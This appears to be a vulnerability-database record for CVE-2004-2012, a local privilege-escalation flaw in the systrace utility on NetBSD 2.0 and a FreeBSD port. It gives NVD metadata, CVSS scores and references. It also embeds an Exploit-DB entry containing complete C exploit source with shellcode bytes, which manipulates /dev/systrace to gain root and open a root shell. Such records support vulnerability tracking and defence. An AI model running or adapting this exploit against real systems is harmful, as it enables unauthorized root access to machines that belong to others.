ID CVE-2004-2012
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:31:00
Description
The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dev/systrace connection before setting euid to 0, which allows local users to gain root privileges.
{"id": "CVE-2004-2012", "bulletinFamily": "NVD", "title": "CVE-2004-2012", "description": "The systrace_exit function in the systrace utility for NetBSD-current and 2.0 before April 16, 2004, and certain FreeBSD ports, does not verify the owner of the /dec/systrace connection before setting euid to 0, which allows local users to gain root privileges.", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2012", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/16110", "http://secunia.com/advisories/11585", "http://marc.info/?l=bugtraq&m=108432258920570&w=2", "http://www.securityfocus.com/bid/10320", "ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-007.txt.asc"], "cvelist": ["CVE-2004-2012"], "type": "cve", "lastseen": "2021-02-02T05:23:00", "edition": 4, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:24113"]}], "modified": "2021-02-02T05:23:00", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-02-02T05:23:00", "rev": 2}, "vulnersScore": 5.9}, "cpe": ["cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09", "cpe:/a:niels:provos_systrace:1.3", "cpe:/a:niels:provos_systrace:1.1", "cpe:/a:niels:provos_systrace:1.5", "cpe:/a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02", "cpe:/a:niels:provos_systrace:1.2", "cpe:/a:niels:provos_systrace:1.4", "cpe:/o:netbsd:netbsd:2.0"], "affectedSoftware": [{"cpeName": "vladimir_kotal:systrace_port_for_freebsd", "name": "vladimir kotal systrace port for freebsd", "operator": "eq", "version": "2004-06-02"}, {"cpeName": "vladimir_kotal:systrace_port_for_freebsd", "name": "vladimir kotal systrace port for freebsd", "operator": "eq", "version": "2004-03-09"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", 
"operator": "eq", "version": "1.5"}, {"cpeName": "netbsd:netbsd", "name": "netbsd", "operator": "eq", "version": "2.0"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.1"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.3"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.4"}, {"cpeName": "niels:provos_systrace", "name": "niels provos systrace", "operator": "eq", "version": "1.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:netbsd:netbsd:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:niels:provos_systrace:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.5:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-03-09:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 
"cpe:2.3:a:vladimir_kotal:systrace_port_for_freebsd:2004-06-02:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:niels:provos_systrace:1.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "11585", "refsource": "SECUNIA", "tags": [], "url": "http://secunia.com/advisories/11585"}, {"name": "10320", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/10320"}, {"name": "systrace-gain-privileges(16110)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16110"}, {"name": "20040510 Advisory 04/2004: Net(Free)BSD Systrace local root vulnerabilitiy", "refsource": "BUGTRAQ", "tags": [], "url": "http://marc.info/?l=bugtraq&m=108432258920570&w=2"}, {"name": "NetBSD-SA2004-007", "refsource": "NETBSD", "tags": [], "url": "ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2004-007.txt.asc"}]}
{"exploitdb": [{"lastseen": "2016-02-02T22:32:41", "description": "NetBSD/FreeBSD Port Systrace 1.x Exit Routine Access Validation Privilege Escalation Vulnerability. CVE-2004-2012. Local exploit for bsd platform", "published": "2004-05-11T00:00:00", "type": "exploitdb", "title": "NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2012"], "modified": "2004-05-11T00:00:00", "id": "EDB-ID:24113", "href": "https://www.exploit-db.com/exploits/24113/", "sourceData": "source: http://www.securityfocus.com/bid/10320/info\r\n\r\nA vulnerability has been reported that affects Systrace on NetBSD, as well as the FreeBSD port by Vladimir Kotal. \r\n\r\nThe source of the issue is insufficient access validation when a systraced process is restoring privileges. \r\n\r\nThis issue can be exploited by a local attacker to gain root privileges on a vulnerable system.\r\n\r\n#include <stdio.h>\r\n#include <sys/ioctl.h>\r\n#include <fcntl.h>\r\n#include <sys/systrace.h>\r\n\r\n#define systrace_device \"/dev/systrace\"\r\n\r\nchar MAGIC[] = \"\\x53\\x31\\xc0\\x50\\x50\\x50\\x50\\xb8\\x03\\x00\\x00\\x00\"\r\n \"\\xcd\\x80\\x83\\xc4\\x10\\xb8\\x00\\x00\\xc0\\xbf\\x94\\x50\"\r\n \"\\xb8\\x03\\x00\\x00\\x00\\xcd\\x80\\x5b\\x87\\xe3\\x5b\\xc3\";\r\n\r\nvoid (*magic)(void) = MAGIC;\r\n\r\nint nbsd_systrace_open()\r\n{\r\n int fd;\r\n\r\n printf(\"[+] Connecting to %s... \", systrace_device);\r\n fd = open(systrace_device, O_RDONLY, 0);\r\n if (fd == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n exit(1);\r\n }\r\n printf(\"done.\\n\");\r\n\r\n return (fd);\r\n}\r\n\r\nint nbsd_attach_parent(int fd)\r\n{\r\n pid_t pid = getppid();\r\n\r\n printf(\"[+] Attaching to parent... 
\");\r\n if (ioctl(fd, STRIOCATTACH, &pid) == -1) {\r\n perror(\"failed with error: \");\r\n printf(\"\\nSorry but the exploit failed\\n\");\r\n }\r\n printf(\"done.\\n\");\r\n return (0);\r\n}\r\n\r\nvoid nbsd_handle_msg(int fd)\r\n{\r\n struct str_message msg;\r\n struct systrace_answer ans;\r\n int r;\r\n\r\n r = read(fd, &msg, sizeof(msg));\r\n\r\n if (r != sizeof(msg)) {\r\n exit(1);\r\n }\r\n\r\n memset(&ans, 0, sizeof(ans));\r\n ans.stra_pid = msg.msg_pid;\r\n ans.stra_seqnr = msg.msg_seqnr;\r\n ans.stra_policy = SYSTR_POLICY_PERMIT;\r\n ans.stra_flags =\r\nSYSTR_FLAGS_RESULT|SYSTR_FLAGS_SETEUID|SYSTR_FLAGS_SETEUID;\r\n ans.stra_error = 0;\r\n ans.stra_seteuid = getuid();\r\n ans.stra_setegid = getgid();\r\n\r\n if (ioctl(fd, STRIOCANSWER, &ans) == -1);\r\n\r\n}\r\n\r\nvoid doit()\r\n{\r\n int p,f,fd;\r\n\r\n fd = nbsd_systrace_open();\r\n\r\n f = fork();\r\n\r\n if (f == 0) {\r\n sleep(1);\r\n nbsd_attach_parent(fd);\r\n while (1) {\r\n nbsd_handle_msg(fd);\r\n }\r\n exit(1);\r\n }\r\n printf(\"[+] Doing some magic... \");\r\n sleep(2);\r\n magic();\r\n\r\n setuid(0);\r\n setgid(0);\r\n\r\n kill(f, 9);\r\n\r\n if (getuid() != 0) {\r\n printf(\"failed.\\n\");\r\n printf(\"\\nSorry but the exploit failed.\");\r\n exit(1);\r\n }\r\n\r\n printf(\"done.\\n\\n\");\r\n\r\n system(\"uname -v\");\r\n system(\"id\");\r\n execlp(\"/bin/sh\", \"/bin/sh\", 0);\r\n}\r\n\r\nvoid banner()\r\n{\r\n printf(\"NetBSD/x86 systrace local root exploit\\n\");\r\n printf(\"by ziegenpeter\\n\\n\");\r\n\r\n if (getuid() == 0) {\r\n printf(\"no comment\\n\");\r\n exit(1);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n banner();\r\n doit();\r\n return (0);\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24113/"}]}